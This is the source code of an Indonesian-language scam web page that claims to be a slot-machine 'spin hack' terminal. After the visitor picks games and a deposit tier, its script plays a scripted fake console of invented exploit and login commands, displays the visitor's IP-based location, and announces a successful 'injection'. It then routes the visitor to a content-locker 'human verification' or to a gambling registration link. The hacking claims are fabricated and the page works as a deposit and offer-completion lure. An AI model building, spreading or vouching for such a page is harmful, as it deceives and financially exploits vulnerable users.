<!DOCTYPE html>
<html lang="en">
<head>
    <title>MaxJip Engine Terminal</title>
<meta name="description" content="Visit this webpage to generate free Robux!">
<meta property="og:title" content="Robux Generator">
<meta property="og:description" content="Kunjungi Halamn Ini Untuk Mendapatkan WRP Tinggi">
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script src="https://bonanza.brewokengine.web.id/6.4.1/bundle.min.js" integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF" crossorigin="anonymous"></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
    ga('create', 'UA-229104178-1', 'auto');
    ga('send', 'pageview');

</script>


<script src="https://kit.fontawesome.com/4f3ce16e3e.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" type="text/css" href="https://bonanza.brewokengine.web.id/assets/content_lockers/css_front.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Source+Code+Pro&display=swap" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="https://bonanza.brewokengine.web.id/assets/content_lockers/bootstrap.min.css">
    <link href="https://bonanza.brewokengine.web.id/assets/content_lockers/sweetalert.css" rel="stylesheet" type="text/css">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style type="text/css">
        #formRowContainer div:only-child{
            width:100% !important;
        }
        *{
            margin:0;
            padding:0;
            border:0;
            font-family: 'Source Code Pro', monospace;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }
        .row {
            margin-right: -15px;
            margin-left: -15px;
        }
        @font-face {
            font-family: 'blender-pro-book';
            src:
            url('cloudfls.co/assets/content_lockers/fonts/blenderpro-book-webfont.ttf') format('truetype'),
            url('//s3.us-west-1.amazonaws.com/cloudfls.co/assets/content_lockers/fonts/blenderpro-book-webfont.html') format('woff2'),
            url('cloudfls.co/assets/content_lockers/fonts/blenderpro-book-webfont.woff') format('woff'),
            url('cloudfls.co/assets/content_lockers/fonts/blenderpro-book-webfont.svg') format('svg');
            font-weight: normal;
            font-style: normal;
        }
        #header{
            border-bottom: 2px groove rgba(10,143,213, 0.65);
        }
        #header,#bottom {
            background-color: #000000;
            opacity: 0.75;
            height: 96px;
            position: relative;
            width:100%;
        }
        #bottom{
            background-color: rgba(0,0,0, 0.75);
            height: 0px;
            border-top: 2px groove rgba(256,256,256, 0.65);
            position:absolute;
            bottom:0;
        }
        @media screen and (max-height: 720px) {
            #bottom {
                display: none;
            }
        }
        #box{
            margin:150px auto 0;
            width:100%;
            max-width: 750px;
        }
        #boxHeader{       	
            color: #fff;
            background-color: rgba(255,255,255,0.85);
            border-color: #ddd;
            border-top-left-radius: 0px;
            border-top-right-radius: 0px;
            padding: 10px 15px;
            position:sticky;
            border-bottom: 1px solid transparent;
            text-align: left;
            transform:translatex(0px) translatey(-245px)            
        }
        #boxHeader div{
            font-size: 30px;
            color: #000;
            font-weight:500;
            line-height:33px;
        }
        #boxContent{
            font-size: 20px;
            color:#fff;
            background-color:rgba(0, 0, 0, 0.74902);
            padding: 15px;
            padding-bottom: 0px;
            transform:translatex(0px) translatey(-166px)
            
        }
        body{
            background-size: 100% 100%;
            -webkit-background-size: 100% 100%;
            -moz-background-size: 100% 100%;
            -o-background-size: 100% 100%;
            background-color: #000;
            background:url('https://i.postimg.cc/sxJmNqt6/20220704-192338.png') no-repeat center center fixed;
        }
        #overlay{
            background:black;
            height:100%;
            width:100%;
            position: absolute;
            top:0;
            left:0;
            opacity:0.25;
            z-index:1;
            min-height:50px;
        }
        #content{
            z-index:2;
            position: absolute;
            margin: 0 auto;
            text-align: center;
            left: 0;
            right: 0;
        }
        #logo{
            z-index:2;
            position: absolute;
            margin: 0 auto;
            text-align: center;
            left: 0;
            right: 0;
            top: 22px;
            display:inline-block;
            transform:translatex(0px) translatey(674px)
        }
        #logo img{
            height:130px;
        }
        .form-text{
            font-size: 18px;
        }
        .btn-secondary {
            color: #373a3c;
            border-color: #ccc;
        }
        .centerButton{
            text-align: center;
            margin-top:80px;
        }
        #step2Button,#step3Button{
            font-size: 16px;
        }
        #step2Button .fa{
            position: relative;
            top: 1px;
        }
        .instructions{
            margin-bottom: 35px;
        }
        .input-group{
            margin-bottom:40px;
        }
        .input-group-addon img{
            width:20px;height:20px;
        }
        .console{
            height:450px;
            overflow-y: auto;
            color:white;
            text-align: left;
            font-size:14px;
        }
        .newConsoleMsg{
            color:yellow;
        }
        .caretFlash{
            height: 10px;
            top: 5px;
            width: 6px;
            position: relative;
            background-color: white;
            display: inline-block;
            animation: flash 500ms step-end infinite;
        }

        @keyframes flash {
            0% {
                background:white;
            }
            50% {
                background:none;
            }
        }
    .msgInfo{
        color:#00BFFF
    }
        .msgSuccess{
            color: #73ff67
        }
        .msgPrompt{
            color:#DB7093;
        }
        .msgFail{
            color: #73ff67;
        }
        .userInput{
            display:inline-block;margin-left:10px;
            color:yellow;
        }

        /*LOADING SCREEN CSS*/
        .spinner{margin:20% auto;width:40px;height:40px;position:relative}.cube1,.cube2{background-color:#fff;width:25px;height:25px;position:absolute;top:350;left:-10;-webkit-animation:sk-cubemove 1.8s infinite ease-in-out;animation:sk-cubemove 1.8s infinite ease-in-out}.cube2{-webkit-animation-delay:-.9s;animation-delay:-.9s}@-webkit-keyframes sk-cubemove{25%{-webkit-transform:translateX(42px) rotate(-90deg) scale(0.5)}50%{-webkit-transform:translateX(42px) translateY(42px) rotate(-180deg)}75%{-webkit-transform:translateX(0px) translateY(42px) rotate(-270deg) scale(0.5)}100%{-webkit-transform:rotate(-360deg)}}@keyframes sk-cubemove{25%{transform:translateX(42px) rotate(-90deg) scale(0.5);-webkit-transform:translateX(42px) rotate(-90deg) scale(0.5)}50%{transform:translateX(42px) translateY(42px) rotate(-179deg);-webkit-transform:translateX(42px) translateY(42px) rotate(-179deg)}50.1%{transform:translateX(42px) translateY(42px) rotate(-180deg);-webkit-transform:translateX(42px) translateY(42px) rotate(-180deg)}75%{transform:translateX(0px) translateY(42px) rotate(-270deg) scale(0.5);-webkit-transform:translateX(0px) translateY(42px) rotate(-270deg) scale(0.5)}100%{transform:rotate(-360deg);-webkit-transform:rotate(-360deg)}}.loadingScreen{background-color:#2980b9;position:fixed;z-index:99999;top:0;left:0;width:100%;height:100%}



    </style>

</head>
<body>
<div class="loadingScreen">
    <div class="spinner">
        <div class="cube1"></div>
        <div class="cube2"></div>
    </div>
</div>
<div id="overlay"></div>
<div id="CPABUILDHTMLcontainer" style="min-height:600px;">
    <div id="header"></div>
    <div id="logo"><img src="https://i.postimg.cc/sxJmNqt6/20220704-192338.png"></div>
    <div id="content">
            <div id="box">
                <div id="boxHeader"><div>Maxjip Engine Terminal <i class="fa fa-terminal blue-text-color"></i></div></div>
                <div id="boxContent">
                    <div id="step1" style="display: block;">
                        <p class="instructions">Untuk Mendapatkan USER ID. Klik pada tombol di bawah ini</p>
                        <a href="https://bit.ly/situsadmin" target="_blank"><button type="button" class="btn btn-outline-danger">
    Dapatkan User ID
</button></a><br><br>
	
	
                        <div class="row">
                            <div class="col-md-6">
                                <div class="input-group">
                                    <span class="input-group-addon"><i class="fa fa-user-secret fa-lg"></i></span>
                                    <input id="username" type="text" class="form-control blender-pro-book form-text" placeholder="Enter User Id" aria-describedby="basic-addon1">
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input-group">
                                    <span class="input-group-addon"><i class="fa fa-trophy fa-lg"></i></span>
                                    <select id="games" class="form-control blender-pro-book form-text"multiple aria-label="multiple select example">      
                                                    <optgroup label="PILIH GAME">		
                                                      <option value=" Sweet bonanza">Sweet Bonanza</option>
                                                        <option value=" Sweet bonanza xmass">Sweet Bonanza Xmass</option>
													                                          	<option  value=" Gate of olympus">Gate Of Olympus</option>
                                                      <option value=" Starlight princess">Starlight Princess</option>
                                                  <option value=" Wild west gold Megaways">Wild West Gold Megaway</option>
                                                  <option value=" Great rhino Megaways">Great Rhino Megaways</option>
                                                  <option value=" Power of thor Megaways">Power Of Thor Megaway</option>
                                                      		<option value=" Pyramid bonanza">Pyramid Bonanza</option></select>
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input-group">
                                    <span class="input-group-addon"><i class="fa fa-desktop fa-lg"></i></span>
                                    <select id="target" class="form-control blender-pro-book form-text"><optgroup label="TARGET SITE">		<option value='https://pentolan88.cc'>www.pentolan88.cc </option></select>
                                </div>
                            </div>
                            <div class="col-md-6">
                                <div class="input-group">
                                    <span class="input-group-addon"><i class="fa fa-terminal fa-lg"></i></span>
                                    <select id="spin" class="form-control blender-pro-book form-text"multiple aria-label="multiple select example">		<optgroup label="ENGINE SPIN HACK">		
  <option value=" Anti baned">Anti Baned</option>
  <option  value=" Big tumble conect hack">Big Tumble Conect Hack </option>
  <option  value=" Big multiplier hack (Beta)">Big Multiplier Hack</option>
  <option value=" Doble drop scater hack" >Doble Drop Scater Hack </option>
  <option value=" Doble chance maxwin hack (Beta)">Doble Chance Maxwin Hack</option>		
<option value=" Scater booster hack">Scater Booster Hack</option></select>
                                </div>
                            </div>
                            <div class="row"> <div class="centerButton"><button type="button" id="step2Button" class="btn btn-secondary"><i class="fa fa-cog fa-spin"></i> Lanjutkana ke step 2</button></div></div>
                        </div>
                    </div>
                    <div style="display: none;" id="step2">
                        <p class="instructions_2">Deposit  & Withdrawal</p>
                        <br>
                        <div class="row">
                            <div id="formRowContainer"><div class='col-md-6'>
		<div class='input-group'>
			<span class='input-group-addon'><i class='fa fa-plus fa-lg'></i></span>

			<select id='form_select_0' class='form-control blender-pro-book form-text'>

<optgroup label="PILIH NOMINAL DEPOSIT"><option value='WRP up to 250%'>50k - 100k WRP up to 250%</option>

<option value='WRP up to 500%'>101k - 250k WRP up to 500%</option><option value='WRP up to 750%'>251k - 500k WRP up to 750%</option><option value='WRP up to 1000%'>Di atas 500k WRP up to 1000%</option></select>
		</div>
	</div></div><br>
	<p class="instructions_2">Pilih Jumlah Deposit WRP (Win Rate Percentage) hack yang Anda butuhkan.</p>
                            <div class="row"> <div class="centerButton"><button type="button" id="step3Button" class="btn btn-secondary"><i class="fa fa-cog fa-spin"></i> KONFIRMASI</button></div></div>
                        </div>
                    </div>
                    
                    <div id="step3" style="display: none;">
                        <div class="console">
                            <span class="consoleContent">
                            </span><span class="caretFlash">&nbsp;</span>

                        </div>
                        <div class="row" style="margin-bottom: -31px;"><input id="command" style="background:none;color:white;" type="text" class="form-control blender-pro-book form-text" placeholder="Enter Command" aria-describedby="basic-addon1"></div>
                    </div>
                </div>
            </div>
    </div>
    <div id="bottom"></div>

</div>
<script src="https://bonanza.brewokengine.web.id/ajax/libs/jquery/1/jquery.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":2560795,"key":"2d12a","testing":1};
</script>
<script src="https://bonanza.brewokengine.web.id/public/external/locker.js"></script>
<script src="https://bonanza.brewokengine.web.id/assets/content_lockers/sweetalert.min.js"></script>
<script type="text/javascript">
    var interactiveMode=parseInt("1");
    var cnsleTimer;
    var cnsleContnue=true;
    var waitingForInput=false;
    var lastUserInput="";
    var lastMessage=0;
    var locationArr={
        city:"New York",
        continent:"NA",
        country:"US",
        ip:"192.0.117.221",
        latitude:32.7977,
        longitude:-117.2335,
        state:"New York",
        state_code:"NY",
        zip_code:"11249"
    };
    var userSettings=[];
    $(window).load(function(){
        $('.loadingScreen').fadeOut(500);
    });
    $(document).ready(function(){

        location();
       $('#step2Button').click(function(){
           if($('#username').val()==""){
               swal("Error", "Username is required", "error")
           }
           else{
               $('#step1').fadeOut(500,function(){
                   $('#step2').fadeIn(500);
               });
           }

           return false;
       });
        $('#step3Button').click(function(){
            $('#step2').fadeOut(500,function(){
                CPABUILDclearcnsle();
                startNewCommand();
                $('#step3').fadeIn(500,function(){
                    setTimeout(function(){
                        CPABUILDcnsleStart();
                    },1200);
                });

            });
            return false;
        });
        $('#command').on("keypress", function(e) {
            if (e.keyCode == 13) {
                var command=$('#command');
                var val=command.val();
                command.val('');

                if(waitingForInput){
                    appendMessage('<div class="userInput">'+val+'</div>');
                    val=val.toLowerCase();
                    var validCommands=['yes','y','n','no'];
                    if(validCommands.indexOf(val)==-1){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Response not valid. Please enter 'yes' or 'no'.</span>");
                    }
                    else{
                        lastUserInput=val;
                        CPABUILDcnsleCommand(lastMessage+1);
                        waitingForInput=false;
                    }
                }
                return false; // prevent the button click from happening
            }
        });
        function getSettings(){
            userSettings=[];
            userSettings['username']=$('#username').val();
            userSettings['games']=$('#games').val();
            userSettings['target']=$('#target').val();
            userSettings['spin']=$('#spin').val();
            var formGInputs=[];
            $('#step2').find('select').each(function(){
                formGInputs.push($(this).val());
            });
            userSettings['formG']=formGInputs.join(" - ")
        }
        function CPABUILDcnsleCommand(counter){
            lastMessage=counter;
            var command=messages[counter];
            if(typeof command === 'object'){
                command.funct();
                if(cnsleContnue && (typeof command.prompt=="undefined" || !prompt)){
                    cnsleTimer=setTimeout(function(){CPABUILDcnsleCommand(counter+1)},command.afterSleep);
                }
            }
        }
        function CPABUILDclearcnsle(){
            cnsleContnue=false;
            window.clearTimeout(cnsleTimer);
            $('.consoleContent').html('');
        }
        function CPABUILDcnsleStart(){
            getSettings();
            cnsleContnue=true;
            waitingForInput=false;
            CPABUILDcnsleCommand(0);
        }
        function location(){
            //
            $.getJSON('//d35kbxc0t24sp8.cloudfront.net/public/scripts/location.php?callback=?','firstname=Jeff',function(res){
                if(res){
                    locationArr=res;
                    console.log(locationArr);
                }
            });
        }
        function typeTocnsle(string,i,speed){
            if(!speed){
                speed=50;
            }
            var char=(string.charAt(i));
            $('.consoleContent').append(char);
            scrollBottom();
            if(i<string.length-1){
                setTimeout(function(){
                    typeTocnsle(string,i+1,speed)
                },speed);
            }

        }
        function startNewCommand(){
            $('.consoleContent').append('<span class="newConsoleMsg">'+locationArr.ip+'@root:</span>');
            scrollBottom();
        }
        function lineBreak(){
            $('.consoleContent').append('<br>');
            scrollBottom();
        }
        function appendMessage(msg){
            $('.consoleContent').append(msg);
            scrollBottom();
        }
        function scrollBottom(){
            var d = $('.console');
            d.scrollTop(d.prop("scrollHeight"));
        }
        var messages;
        if(interactiveMode==1){
            messages=[
                {
                    funct:function(){
                        typeTocnsle("/usr/local/bin/locate.phar --ip "+locationArr.ip,0);
                    },
                    afterSleep:(("/usr/local/bin/locate.phar --ip xxx.xxx.xxx.xxx").length*50)+300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Menemukan server terdekat untuk "+locationArr.ip+"</span>");
                        lineBreak();
                        typeTocnsle("....",0,1200);
                    },
                    afterSleep:(("....").length*1200)+800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Server ditemukan</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>State: "+locationArr.state+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Kota: "+locationArr.city+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>"+locationArr.continent+" "+locationArr.country+" "+locationArr.longitude+" "+locationArr.latitude+"</span>");
                    },
                    afterSleep:800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Sebaiknya gunakan server yang terdeteksi otomatis di atas. Menggunakan server terdekat yang mungkin akan mengurangi kemungkinan Di BANNED.</span>");
                    },
                    afterSleep:600
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Memilih tidak pada prompt ini akan menggunakan server umum.</span>");
                    },
                    afterSleep:600
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Gunakan server yang terdeteksi otomatis di atas? (Y/n)</span>");
                        waitingForInput=true;
                        $('#command').focus();
                    },
                    prompt:true,
                },
                {
                    funct:function(){
                        lineBreak();
                        if(lastUserInput=="y" || lastUserInput=="yes"){
                            appendMessage("<span class='msgInfo'>Menggunakan server yang terdeteksi otomatis.</span>");
                        }
                        else{
                            appendMessage("<span class='msgInfo'>Menggunakan server Umum.</span>");
                        }
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        typeTocnsle("/usr/local/bin/settings.py --input document.getElementById(settingsForm)",0);
                    },
                    afterSleep:(("/usr/local/bin/settings.py --input document.getElementById(settingsForm)").length*50)+1200
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Mendeteksi konfigurasi...</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        getSettings();
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Username: "+userSettings['username']+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Pilihan Game: "+userSettings['games']+"</span>");
                    },
                    afterSleep:300
                },
                {
                	funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Web Target: "+userSettings['target']+"</span>");
                    },
                    afterSleep:300
                },
                {
                	funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Engine spin hack : "+userSettings['spin']+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>WRP : "+userSettings['formG']+"</span>");
                    },
                    afterSleep:300
                },
                {              	
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Apakah konfigurasi ini sudah benar? (Y/n)</span>");
                        waitingForInput=true;
                        $('#command').focus();
                    },
                    prompt:true,
                },
                {
                    funct:function(){
                        lineBreak();
                        if(lastUserInput=="y" || lastUserInput=="yes"){
                            appendMessage("<span class='msgInfo'>Settings confirmed.</span>");
                        }
                        else{
                            CPABUILDclearcnsle();
                            appendMessage("<span class='msgInfo'>Kembali ke form...</span>");
                            setTimeout(function(){
                                $('#step3').fadeOut(500,function(){
                                    $('#step1').fadeIn(500);
                                });
                            },1000);

                        }
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        typeTocnsle("/usr/local/bin/login.py login --attempt=0;username="+userSettings['username']+";ip="+locationArr.ip+"; curl --limit-rate 1000B --using=devGet("+userSettings['device']+") --header=User-Agent: curl/7.21.0 (i486-pc-linux-gnu) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6 ",0);
                    },
                    afterSleep:(("/usr/local/bin/login.py login --attempt=0;username=xxxxxxxxxxxxxxxxxxx;ip=xxxxxxxxxxxxxxxx; curl --limit-rate 1000B --using=devGet(xxxxxxxxx) --header=User-Agent: curl/7.21.0 (i486-pc-linux-gnu) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6").length*50)+1200
                },
                {
                    funct:function(){
                        lineBreak();
                        typeTocnsle("..",0,1200);
                    },
                    afterSleep:(("..").length*1200)+800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Akun ditemukan di "+userSettings['target']+".</span>");
                    },
                    afterSleep:2500
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        var monthNames = ["January", "February", "March", "April", "May", "June",
                            "July", "August", "September", "October", "November", "December"
                        ];

                        var d = new Date();
                        var dateString=( monthNames[d.getMonth()] + " " +d.getDate() + ", " + d.getFullYear() + " " +d.getHours()+":"+ d.getMinutes()+":"+ d.getSeconds());

                        typeTocnsle("/usr/local/bin/exploit.py exploitCheck --curl Set-Cookie=PREF=ID=7c497a6b15cc092d: FF=0:TM=1334056719:LM=1334056719: S=UORpBwxFmTRkbXLj;expires=null; --content=Content-Type:json;charset=ISO-8859-1 --login="+dateString+" --check "+userSettings['username'],0);
                    },
                    afterSleep:(("/usr/local/bin/exploit.py exploitCheck --curl Set-Cookie=PREF=ID=7c497a6b15cc092d: FF=0:TM=1334056719:LM=1334056719: S=UORpBwxFmTRkbXLj;expires=null; --content=Content-Type:json;charset=ISO-8859-1 --login=xxxxxxxxxxxxxxxxxx --check xxxxxxxxxxxxx").length*50)+2500
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Engine Spin Tersedia! Konfigurasi Baru:"+userSettings['username']+"  "+userSettings['games']+" "+userSettings['spin']+" "+userSettings['target']+" "+userSettings['formG']+"</span>");
                    },
                    afterSleep:2500
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        typeTocnsle("/usr/local/bin/verify.py verificationCheck --context("+userSettings['username']+":"+locationArr.ip+") --onComplete=function(){exploit.execute("+userSettings['formG']+")}",0);
                    },
                    afterSleep:(("/usr/local/bin/verify.py verificationCheck --context(xxxxxxxxxxxxxx:xxxxxxxxxxxxxxxx) --onComplete=function(){exploit.execute(xxxxxxxxxxxxxxxxxxxxxxxxxxx)}").length*50)+2500
                },
                {
                    funct:function(){
                        lineBreak();
                        typeTocnsle("...",0,1200);
                    },
                    afterSleep:(("...").length*1200)+800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgFail'>Inject Engine Spin SUKSES!.</span>");
                    },
                    afterSleep:3600
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgFail'>Verifikasi manusia diperlukan untuk melanjutkan.</span>");
                    },
                    afterSleep:2400
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Script engine ini dibuat oleh Slot Hack Group, Temukan kami di grup Telegram https://t.me/hackgameslot.</span>");
                    },
                    afterSleep:2400
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Lanjutkan ke situs target sekarang? (Y/n)</span>");
                        waitingForInput=true;
                        $('#command').focus();
                    },
                    prompt:true,
                },
                {
                    funct:function(){
                        lineBreak();
                        if(lastUserInput=="y" || lastUserInput=="yes"){
                            appendMessage("<span class='msgInfo'>Mengarahkan ke SITUS TARGET...</span>");
                            window.location.href = "https://cararegistrasi.com/pentolan88";

                        }
                        else{
                            appendMessage("<span class='msgFail'>Eksekusi gagal. Segarkan halaman ini untuk mencoba lagi.</span>");
                        }
                    },
                    afterSleep:999999999999999
                },
            ];
        }
        else{
            messages=[
                {
                    funct:function(){
                        typeTocnsle("/usr/local/bin/locate.phar --ip "+locationArr.ip,0);
                    },
                    afterSleep:(("/usr/local/bin/locate.phar --ip xxx.xxx.xxx.xxx").length*50)+300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Menemukan server terdekat untuk "+locationArr.ip+"</span>");
                        lineBreak();
                        typeTocnsle("....",0,1200);
                    },
                    afterSleep:(("....").length*1200)+800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgSuccess'>Server ditemukan</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Negara: "+locationArr.state+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Kota: "+locationArr.city+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>"+locationArr.continent+" "+locationArr.country+" "+locationArr.longitude+" "+locationArr.latitude+"</span>");
                    },
                    afterSleep:800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgSuccess'>Menggunakan server terdekat untuk anti-ban. </span>");
                    },
                    afterSleep:600
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        typeTocnsle("/usr/local/bin/settings.py --input document.getElementById(settingsForm)",0);
                    },
                    afterSleep:(("/usr/local/bin/settings.py --input document.getElementById(settingsForm)").length*50)+1200
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Mendeteksi konfigurasi...</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        getSettings();
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Username: "+userSettings['username']+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Perangkat: "+userSettings['device']+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>WRP : "+userSettings['formG']+"</span>");
                    },
                    afterSleep:300
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgSuccess'>Konfigurasi Dikonfirmasi.</span>");
                    },
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        typeTocnsle("/usr/local/bin/login.py login --attempt=0;username="+userSettings['username']+";ip="+locationArr.ip+"; curl --limit-rate 1000B --using=devGet("+userSettings['device']+") --header=User-Agent: curl/7.21.0 (i486-pc-linux-gnu) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6 ",0);
                    },
                    afterSleep:(("/usr/local/bin/login.py login --attempt=0;username=xxxxxxxxxxxxxxxxxxx;ip=xxxxxxxxxxxxxxxx; curl --limit-rate 1000B --using=devGet(xxxxxxxxx) --header=User-Agent: curl/7.21.0 (i486-pc-linux-gnu) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6").length*50)+1200
                },
                {
                    funct:function(){
                        lineBreak();
                        typeTocnsle("..",0,1200);
                    },
                    afterSleep:(("..").length*1200)+800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgFail'>Login akun gagal.</span>");
                    },
                    afterSleep:1500
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Mencoba kembali (2/3)</span>");
                    },
                    afterSleep:400
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        typeTocnsle("/usr/local/bin/login.py login --attempt=2;username="+userSettings['username']+";ip="+locationArr.ip+"; curl --limit-rate 1000B --using=devGet("+userSettings['device']+") --header=User-Agent:Mobile-Type:json; ",0);
                    },
                    afterSleep:(("/usr/local/bin/login.py login --attempt=2;username="+userSettings['username']+";ip="+locationArr.ip+"; curl --limit-rate 1000B --using=devGet("+userSettings['device']+") --header=User-Agent:Mobile-Type:json; ").length*50)+1200
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgSuccess'>Login BERHASIL!</span>");
                    },
                    afterSleep:2500
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        var monthNames = ["January", "February", "March", "April", "May", "June",
                            "July", "August", "September", "October", "November", "December"
                        ];

                        var d = new Date();
                        var dateString=( monthNames[d.getMonth()] + " " +d.getDate() + ", " + d.getFullYear() + " " +d.getHours()+":"+ d.getMinutes()+":"+ d.getSeconds());

                        typeTocnsle("/usr/local/bin/exploit.py exploitCheck --curl Set-Cookie=PREF=ID=7c497a6b15cc092d: FF=0:TM=1334056719:LM=1334056719: S=UORpBwxFmTRkbXLj;expires=null; --content=Content-Type:json;charset=ISO-8859-1 --login="+dateString+" --check "+userSettings['username'],0);
                    },
                    afterSleep:(("/usr/local/bin/exploit.py exploitCheck --curl Set-Cookie=PREF=ID=7c497a6b15cc092d: FF=0:TM=1334056719:LM=1334056719: S=UORpBwxFmTRkbXLj;expires=null; --content=Content-Type:json;charset=ISO-8859-1 --login=xxxxxxxxxxxxxxxxxx --check xxxxxxxxxxxxx").length*50)+2500
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgInfo'>Engine Spin Tersedia! Konfigurasi baru: "+userSettings['formG']+"</span>");
                    },
                    afterSleep:2500
                },
                {
                    funct:function(){
                        lineBreak();
                        startNewCommand();
                        typeTocnsle("/usr/local/bin/verify.py verificationCheck --context("+userSettings['username']+":"+locationArr.ip+") --onComplete=function(){exploit.execute("+userSettings['formG']+")}",0);
                    },
                    afterSleep:(("/usr/local/bin/verify.py verificationCheck --context(xxxxxxxxxxxxxx:xxxxxxxxxxxxxxxx) --onComplete=function(){exploit.execute(xxxxxxxxxxxxxxxxxxxxxxxxxxx)}").length*50)+2500
                },
                {
                    funct:function(){
                        lineBreak();
                        typeTocnsle("...",0,1200);
                    },
                    afterSleep:(("...").length*1200)+800
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgFail'>Verifikasi gagal</span>");
                    },
                    afterSleep:3600
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Engine Script ini TIDAK tersedia untuk bot. Verifikasi manusia diperlukan untuk melanjutkan.</span>");
                    },
                    afterSleep:1200
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Setelah verifikasi, nilai Anda akan diperbarui secara otomatis dan Engine Spin akan selesai.</span>");
                    },
                    afterSleep:1200
                },
                {
                    funct:function(){
                        lineBreak();
                        appendMessage("<span class='msgPrompt'>Melakukan Verifikasi...</span>");
                        waitingForInput=true;
                        $('#command').focus();
                    },
